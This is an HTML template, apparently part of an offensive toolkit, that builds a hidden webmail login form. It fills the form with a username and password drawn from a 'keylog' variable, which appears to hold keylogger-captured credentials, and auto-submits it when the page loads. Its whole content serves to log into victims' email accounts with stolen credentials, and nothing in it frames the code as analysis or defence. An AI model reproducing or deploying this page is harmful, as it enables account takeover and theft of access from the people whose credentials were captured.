<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Adams</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="http://code.jquery.com/jquery-latest.js"></script>
  </head>
  <body>
      <form action="{{web_mail_url}}" method='post'>
          <input type="hidden" name="_timezone" value="_default_" />
          <input type="hidden" name="_task" value="login" />
          <input type="hidden" name="_autologin" value="1" />
          <input type="hidden" name='_action' value="login">
          <input type="hidden" name='_user' value="{{keylog.user_name}}">
          <input type="hidden" name='_pass' value="{{keylog.pwd}}">
          <input type="hidden" name='_host' value="{{host}}">
          </form>   
          <script type="text/javascript" charset="utf-8">
               $(function(){
                  $('form').submit(); 
                })
          </script>

      </body>
</html>
